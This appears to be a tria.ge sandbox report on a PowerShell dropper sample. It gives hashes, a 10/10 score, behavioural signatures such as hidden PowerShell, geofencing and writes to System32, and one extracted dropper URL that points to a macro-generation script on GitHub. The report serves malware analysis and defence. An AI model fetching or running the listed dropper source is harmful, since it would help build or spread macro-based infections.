Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284

  • Size

    44KB

  • Sample

    240709-15sm8a1aqg

  • MD5

    1e9ed7e79c0f48996fedb74189895ae6

  • SHA1

    e0f104e40847774f3ca32fff30bdfc4548691b02

  • SHA256

    832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284

  • SHA512

    2c648e9ef3e931ea9a0e182b75cc0d2db4d2ee478082ade6654f0d1e8b3cfc516c515031e260283c830b08f39ed1f946d1c7f468be18be99441cfbff8e3fc5e4

  • SSDEEP

    768:Ytvo+lzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSp5kuFlmQQpIvH9acc9acyL:IPk3hbdlylKsgqopeJBWhZFGkE+cL2N5

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Targets

    • Target

      832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284

    • Size

      44KB

    • MD5

      1e9ed7e79c0f48996fedb74189895ae6

    • SHA1

      e0f104e40847774f3ca32fff30bdfc4548691b02

    • SHA256

      832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284

    • SHA512

      2c648e9ef3e931ea9a0e182b75cc0d2db4d2ee478082ade6654f0d1e8b3cfc516c515031e260283c830b08f39ed1f946d1c7f468be18be99441cfbff8e3fc5e4

    • SSDEEP

      768:Ytvo+lzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSp5kuFlmQQpIvH9acc9acyL:IPk3hbdlylKsgqopeJBWhZFGkE+cL2N5

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks